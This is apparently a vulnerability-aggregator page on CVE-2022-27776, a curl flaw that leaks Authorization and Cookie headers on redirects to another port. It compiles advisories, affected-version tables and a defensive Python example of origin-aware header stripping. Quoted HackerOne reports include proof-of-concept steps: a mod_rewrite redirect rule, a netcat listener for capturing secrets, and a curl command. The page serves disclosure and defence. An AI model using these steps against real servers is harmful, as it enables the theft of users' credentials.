CVE-2022-27776
Published 2022-06-02
CVE-2022-27776: An insufficiently protected credentials vulnerability, fixed in curl 7.83.0, might leak authentication or cookie header data on HTTP redirects to the same host but another port number.
Priority: P3 · 35 · medium · 6.5 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
EPSS: 3.43% (87.4th percentile)
Affected
36 ranges, showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | curl | < curl 7.83.0-1 (bookworm) | curl 7.83.0-1 (bookworm) |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| guzzlehttp | guzzle | >= 0 < 6.5.8 | 6.5.8 |
| guzzlehttp | guzzle | >= 7.0.0 < 7.4.5 | 7.4.5 |
| haxx | curl | < 7.83.0 | 7.83.0 |
| haxx | curl | >= 0 < 7.74.0-1.3+deb11u2 | 7.74.0-1.3+deb11u2 |
| haxx | curl | >= 0 < 7.83.0-1 | 7.83.0-1 |
| haxx | curl | >= 0 < 7.83.0-1 | 7.83.0-1 |
| haxx | curl | >= 0 < 7.83.0-1 | 7.83.0-1 |
| haxx | curl | >= 0 < 7.58.0-2ubuntu3.17 | 7.58.0-2ubuntu3.17 |
| haxx | curl | >= 0 < 7.68.0-1ubuntu2.10 | 7.68.0-1ubuntu2.10 |
| haxx | curl | >= 0 < 7.81.0-1ubuntu1.1 | 7.81.0-1ubuntu1.1 |
| https | github.com_curl_curl | — | — |
| msrc | windows_10_version_1809_for_32-bit_systems | — | — |
| msrc | windows_10_version_1809_for_arm64-based_systems | — | — |
| msrc | windows_10_version_1809_for_x64-based_systems | — | — |
| msrc | windows_10_version_20h2_for_32-bit_systems | — | — |
| msrc | windows_10_version_20h2_for_arm64-based_systems | — | — |
| msrc | windows_10_version_21h1_for_32-bit_systems | — | — |
| msrc | windows_10_version_21h1_for_arm64-based_systems | — | — |
| msrc | windows_10_version_21h1_for_x64-based_systems | — | — |
| msrc | windows_10_version_21h2_for_32-bit_systems | — | — |
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 6.5 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N |
| nvd | 2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:N/A:N |
| ghsa | — | 9.8 | CRITICAL | — |
| osv | — | 9.8 | CRITICAL | — |
| vendor_ubuntu | — | 8.1 | HIGH | — |
| vendor_debian | — | 6.5 | MEDIUM | — |
| vendor_msrc | — | 6.5 | HIGH | — |
| vendor_redhat | — | 6.5 | MEDIUM | — |
OSV
undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect
osv·2022-07-21·CVSS 9.8
CVE-2022-31151 [CRITICAL] undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect
undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect
### Impact
Authorization headers are already cleared on cross-origin redirect in
https://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189, based on https://github.com/nodejs/undici/issues/872.
However, cookie headers, which are sensitive headers and are official headers found in the spec, remain uncleared. There has also been active discussion of implementing a cookie store (https://github.com/nodejs/undici/pull/1441), which suggests that there are active users using cookie headers in undici.
As such this may lead to accidental leakage of cookies to a 3rd-party site, or a malicious attacker who can control the redirection target (i.e. an open redirector) can leak the cookie to the 3rd part
GHSA
undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect
ghsa·2022-07-21·CVSS 9.8
CVE-2022-31151 [CRITICAL] CWE-346 undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect
undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect
### Impact
Authorization headers are already cleared on cross-origin redirect in
https://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189, based on https://github.com/nodejs/undici/issues/872.
However, cookie headers, which are sensitive headers and are official headers found in the spec, remain uncleared. There has also been active discussion of implementing a cookie store (https://github.com/nodejs/undici/pull/1441), which suggests that there are active users using cookie headers in undici.
As such this may lead to accidental leakage of cookies to a 3rd-party site, or a malicious attacker who can control the redirection target (i.e. an open redirector) can leak the cookie to the 3rd part
GHSA
Change in port should be considered a change in origin
ghsa·2022-06-21·CVSS 6.5
CVE-2022-31091 [MEDIUM] CWE-200 Change in port should be considered a change in origin
Change in port should be considered a change in origin
### Impact
`Authorization` and `Cookie` headers on requests are sensitive information. On making a request which responds with a redirect to a URI with a different port, if we choose to follow it, we should remove the `Authorization` and `Cookie` headers from the request before continuing. Previously, we would only consider a change in host or a scheme downgrade. Now, we consider any change in host, port or scheme to be a change in origin.
### Patches
Affected Guzzle 7 users should upgrade to Guzzle 7.4.5 as soon as possible. Affected users using any earlier series of Guzzle should upgrade to Guzzle 6.5.8 or 7.4.5.
### Workarounds
An alternative approach would be to use your own redirect middleware, rather than ours, if you are un
GHSA
CURLOPT_HTTPAUTH option not cleared on change of origin
ghsa·2022-06-21·CVSS 6.5
CVE-2022-31090 [MEDIUM] CWE-200 CURLOPT_HTTPAUTH option not cleared on change of origin
CURLOPT_HTTPAUTH option not cleared on change of origin
### Impact
`Authorization` headers on requests are sensitive information. When using our Curl handler, it is possible to use the `CURLOPT_HTTPAUTH` option to specify an `Authorization` header. On making a request which responds with a redirect to a URI with a different origin, if we choose to follow it, we should remove the `CURLOPT_HTTPAUTH` and `CURLOPT_USERPWD` options before continuing, stopping curl from appending the `Authorization` header to the new request. Previously, we would only consider a change in host. Now, we consider any change in host, port or scheme to be a change in origin.
### Patches
Affected Guzzle 7 users should upgrade to Guzzle 7.4.5 as soon as possible. Affected users using any earlier series of Guzzle s
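The two Guzzle advisories above, and the curl description at the top of the page, all come down to the same rule: a redirect target that differs in scheme, host or port is a different origin, and `Authorization` / `Cookie` (or, for libcurl, the `CURLOPT_HTTPAUTH` / `CURLOPT_USERPWD` credentials) must not be carried across it. The following is an added example, not code from curl, Guzzle or undici, that contrasts the pre-fix host-only comparison with the post-fix origin comparison and runs both over a constructed redirect chain to a second port on the same host. The URLs, header values and the `RESPONSES` map are constructed test data.

```python
"""Origin-aware stripping of credential headers when following redirects.

Added example: models the defect described in the advisories (host-only
comparison) beside the corrected rule (scheme + host + port). Not the
implementation of any of the projects on the page.
"""
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

# Headers that carry credentials and must never cross an origin boundary.
SENSITIVE_HEADERS = frozenset({"authorization", "cookie"})


def origin(url):
    """Return (scheme, host, port) with the scheme's default port filled in,
    so https://h/ and https://h:443/ compare equal."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return scheme, host, port


def legacy_is_same_site(from_url, to_url):
    """Pre-fix behaviour from the advisories: only the host name is compared,
    so a redirect to another port (or scheme) on the same host keeps headers."""
    return (urlsplit(from_url).hostname or "").lower() == \
           (urlsplit(to_url).hostname or "").lower()


def fixed_is_same_origin(from_url, to_url):
    """Post-fix behaviour: any change in scheme, host or port is a new origin."""
    return origin(from_url) == origin(to_url)


def headers_for_redirect(headers, from_url, to_url, same_origin=fixed_is_same_origin):
    """Headers to send to the redirect target: unchanged for the same origin,
    otherwise with every sensitive header dropped."""
    if same_origin(from_url, to_url):
        return dict(headers)
    return {k: v for k, v in headers.items() if k.lower() not in SENSITIVE_HEADERS}


def follow(start_url, headers, responses, same_origin=fixed_is_same_origin, max_hops=5):
    """Simulate a client following redirects. `responses` maps a request URL to
    its Location header, or None for a final (non-redirect) response. Returns
    one (url, sorted header names) tuple per hop so the caller can see exactly
    which headers reached each server."""
    hops = []
    url, hdrs = start_url, dict(headers)
    for _ in range(max_hops):
        hops.append((url, sorted(hdrs)))
        location = responses.get(url)
        if location is None:
            return hops
        hdrs = headers_for_redirect(hdrs, url, location, same_origin)
        url = location
    raise RuntimeError("too many redirects")


# Constructed scenario: the API host answers with a redirect to an unprivileged
# port on the same host name, where anything listening can read the request.
RESPONSES = {
    "https://api.example.test/v1/me": "https://api.example.test:9999/capture",
    "https://api.example.test:9999/capture": None,
}
REQUEST_HEADERS = {
    "Authorization": "Bearer constructed-token",   # constructed value
    "Cookie": "session=constructed-session-id",    # constructed value
    "Accept": "application/json",
}


def leaked_headers_with_legacy_check():
    """Header names that reach the :9999 listener under the host-only check."""
    return follow("https://api.example.test/v1/me", REQUEST_HEADERS,
                  RESPONSES, same_origin=legacy_is_same_site)[-1][1]


def headers_with_fixed_check():
    """Header names that reach the :9999 listener under the origin check."""
    return follow("https://api.example.test/v1/me", REQUEST_HEADERS,
                  RESPONSES, same_origin=fixed_is_same_origin)[-1][1]


if __name__ == "__main__":
    print("legacy host-only check sends:", leaked_headers_with_legacy_check())
    print("fixed origin check sends:    ", headers_with_fixed_check())
```

The default-port normalisation in `origin` matters in practice: without it a redirect from `https://host/` to `https://host:443/` would be treated as cross-origin and a legitimate same-site login flow would lose its cookies, which is the usual reason implementations are tempted to compare host names only.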
OSV
Change in port should be considered a change in origin
osv·2022-06-21·CVSS 6.5
CVE-2022-31091 [MEDIUM] Change in port should be considered a change in origin
Change in port should be considered a change in origin
### Impact
`Authorization` and `Cookie` headers on requests are sensitive information. On making a request which responds with a redirect to a URI with a different port, if we choose to follow it, we should remove the `Authorization` and `Cookie` headers from the request before continuing. Previously, we would only consider a change in host or a scheme downgrade. Now, we consider any change in host, port or scheme to be a change in origin.
### Patches
Affected Guzzle 7 users should upgrade to Guzzle 7.4.5 as soon as possible. Affected users using any earlier series of Guzzle should upgrade to Guzzle 6.5.8 or 7.4.5.
### Workarounds
An alternative approach would be to use your own redirect middleware, rather than ours, if you are un
OSV
CURLOPT_HTTPAUTH option not cleared on change of origin
osv·2022-06-21·CVSS 6.5
CVE-2022-31090 [MEDIUM] CURLOPT_HTTPAUTH option not cleared on change of origin
CURLOPT_HTTPAUTH option not cleared on change of origin
### Impact
`Authorization` headers on requests are sensitive information. When using our Curl handler, it is possible to use the `CURLOPT_HTTPAUTH` option to specify an `Authorization` header. On making a request which responds with a redirect to a URI with a different origin, if we choose to follow it, we should remove the `CURLOPT_HTTPAUTH` and `CURLOPT_USERPWD` options before continuing, stopping curl from appending the `Authorization` header to the new request. Previously, we would only consider a change in host. Now, we consider any change in host, port or scheme to be a change in origin.
### Patches
Affected Guzzle 7 users should upgrade to Guzzle 7.4.5 as soon as possible. Affected users using any earlier series of Guzzle s
GHSA
GHSA-hc85-wpv5-52wh: A insufficiently protected credentials vulnerability in fixed in curl 7
ghsa_unreviewed·2022-06-03
CVE-2022-27776 [MEDIUM] CWE-522 GHSA-hc85-wpv5-52wh: A insufficiently protected credentials vulnerability in fixed in curl 7
An insufficiently protected credentials vulnerability, fixed in curl 7.83.0, might leak authentication or cookie header data on HTTP redirects to the same host but another port number.
OSV
CVE-2022-27776: A insufficiently protected credentials vulnerability in fixed in curl 7
osv·2022-06-02·CVSS 6.5
CVE-2022-27776 [MEDIUM] CVE-2022-27776: A insufficiently protected credentials vulnerability in fixed in curl 7
An insufficiently protected credentials vulnerability, fixed in curl 7.83.0, might leak authentication or cookie header data on HTTP redirects to the same host but another port number.
OSV
curl vulnerabilities
osv·2022-04-28·CVSS 8.1
CVE-2022-22576 [HIGH] curl vulnerabilities
curl vulnerabilities
Patrick Monnerat discovered that curl incorrectly handled certain OAUTH2.
An attacker could possibly use this issue to access sensitive information.
(CVE-2022-22576)
Harry Sintonen discovered that curl incorrectly handled certain requests.
An attacker could possibly use this issue to expose sensitive information.
(CVE-2022-27774, CVE-2022-27775, CVE-2022-27776)
Microsoft
HackerOne: CVE-2022-27776 Insufficiently protected credentials vulnerability might leak authentication or cookie header data
vendor_msrc·2022-07-12·CVSS 6.5
CVE-2022-27776 [MEDIUM] HackerOne: CVE-2022-27776 Insufficiently protected credentials vulnerability might leak authentication or cookie header data
HackerOne: CVE-2022-27776 Insufficiently protected credentials vulnerability might leak authentication or cookie header data
FAQ: Why is this a HackerOne CVE?
This CVE is regarding a vulnerability in the curl open source library which is used by Windows. The July 2022 Windows Security Updates includes the most recent version of this library which addresses the vulnerability and others. Please see curl security problems for information on all of the vulnerabilities that have been addressed.
Open Source Software: Open Source Software
HackerOne: HackerOne
Customer Action Required: Yes
Impact: Information Disclosure
Exploit Status: Publicly Disclosed: No; Exploited: No; Latest Software Release: Exploitation Less Likely; Older Software Release: Exploitation Less Likely; DOS: N/A
Reference: https:
Ubuntu
curl vulnerabilities
vendor_ubuntu·2022-04-28·CVSS 8.1
CVE-2022-27774 [HIGH] curl vulnerabilities
Title: curl vulnerabilities
Summary: Several security issues were fixed in curl.
Patrick Monnerat discovered that curl incorrectly handled certain OAUTH2.
An attacker could possibly use this issue to access sensitive information.
(CVE-2022-22576)
Harry Sintonen discovered that curl incorrectly handled certain requests.
An attacker could possibly use this issue to expose sensitive information.
(CVE-2022-27774, CVE-2022-27775, CVE-2022-27776)
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
curl: auth/cookie leak on redirect
vendor_redhat·2022-04-27·CVSS 6.5
CVE-2022-27776 [MEDIUM] CWE-522 curl: auth/cookie leak on redirect
curl: auth/cookie leak on redirect
An insufficiently protected credentials vulnerability, fixed in curl 7.83.0, might leak authentication or cookie header data on HTTP redirects to the same host but another port number.
A vulnerability was found in curl. This security flaw allows leaking authentication or cookie header data on HTTP redirects to the same host but another port number. Sending the same set of headers to a server on a different port number is a problem for applications that pass on custom `Authorization:` or `Cookie:` headers. Those headers often contain privacy-sensitive information or data.
Package: rh-dotnet31-curl (.NET Core 3.1 on Red Hat Enterprise Linux) - Out of support scope
Package: curl (Red Hat Enterprise Linux 6) - Out of support scope
Package: curl (Red Hat Ente
Debian
CVE-2022-27776: curl - A insufficiently protected credentials vulnerability in fixed in curl 7.83.0 mig...
vendor_debian·2022·CVSS 6.5
CVE-2022-27776 [MEDIUM] CVE-2022-27776: curl - A insufficiently protected credentials vulnerability in fixed in curl 7.83.0 mig...
An insufficiently protected credentials vulnerability, fixed in curl 7.83.0, might leak authentication or cookie header data on HTTP redirects to the same host but another port number.
Scope: local
bookworm: resolved (fixed in 7.83.0-1)
bullseye: resolved (fixed in 7.74.0-1.3+deb11u2)
forky: resolved (fixed in 7.83.0-1)
sid: resolved (fixed in 7.83.0-1)
trixie: resolved (fixed in 7.83.0-1)
No detection rules found.
No public exploits indexed.
HackerOne
Credential leak on redirect
hackerone·2022-05-14·CVSS 6.5
CVE-2022-27776 [MEDIUM] Credential leak on redirect
Credential leak on redirect
## Summary:
Curl can be coaxed to leak user credentials to a third-party host by issuing an HTTP redirect, like the Proxy-Authorization or x-auth-token header. It is a bypass of the fix for https://hackerone.com/reports/1547048, CVE-2022-27776.
## Steps To Reproduce:
1. Create a 302.php file, such as:
```
```
Add the 2 record in the /etc/hosts file:
```
127.0.0.1 a.com
127.0.0.1 b.com
```
2. Run `curl -H "Proxy-Authorization: secrettoken" http://b.com/302.php -vv -L`
The redirect will be followed, and the confidential headers sent over insecure HTTP to the specified port:
```
# curl -H "Proxy-Authorization: secrettoken" http://b.com/302.php -vv -L
* Trying 127.0.0.1:80...
* Connected to b.com
```
HackerOne
CVE-2022-27776: Auth/cookie leak on redirect
hackerone·2022-04-29·CVSS 5.7
CVE-2022-27776 [MEDIUM] CVE-2022-27776: Auth/cookie leak on redirect
CVE-2022-27776: Auth/cookie leak on redirect
## Summary:
curl/libcurl can be coaxed to leak Authorization / Cookie headers by redirecting request to http:// URL on the same host. Successful exploitation requires that the attacker can either Man-in-the-Middle the connection or can access the traffic at the recipient side (for example by redirecting to a non-privileged port such as 9999 on the same host).
## Steps To Reproduce:
1. Configure for example Apache2 to perform redirect with mod_rewrite:
```
RewriteCond %{HTTP_USER_AGENT} "^curl/"
RewriteRule ^/redirectpoc http://hostname.tld:9999 [R=301,L]
```
... the attacker could also use `.htpasswd` file to do so.
2. Set up netcat to listen for the incoming secrets:
`while true; do echo -ne 'HTTP/1.1 404 nope\r\nContent-Length: 0\r\n\r\n' |`
HackerOne
CVE-2022-27776: Auth/cookie leak on redirect
hackerone·2022-04-27·CVSS 5.7
CVE-2022-27776 [MEDIUM] CVE-2022-27776: Auth/cookie leak on redirect
CVE-2022-27776: Auth/cookie leak on redirect
## Summary:
Curl can be coaxed to leak Authorisation / Cookie headers by redirecting request to http:// URL on the same host. Successful exploitation requires that the attacker can either Man-in-the-Middle the connection or can access the traffic at the recipient side (for example by redirecting to a non-privileged port such as 9999 on the same host).
## Steps To Reproduce:
1. Configure for example Apache2 to perform redirect with mod_rewrite:
```
RewriteCond %{HTTP_USER_AGENT} "^curl/"
RewriteRule ^/redirectpoc http://hostname.tld:9999 [R=301,L]
```
... the attacker could also use `.htpasswd` file to do so.
2. Set up netcat to listen for the incoming secrets:
`while true; do echo -ne 'HTTP/1.1 404 nope\r\nContent-Length: 0\r\n\r\n' | nc -v -`
References

- https://hackerone.com/reports/1547048
- https://lists.debian.org/debian-lts-announce/2022/08/msg00017.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7N5ZBWLNNPZKFK7Q4KEHGCJ2YELQEUJP/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DKKOQXPYLMBSEVDHFS32BPBR3ZQJKY5B/
- https://security.gentoo.org/glsa/202212-01
- https://security.netapp.com/advisory/ntap-20220609-0008/
- https://www.debian.org/security/2022/dsa-5197

Published: 2022-06-02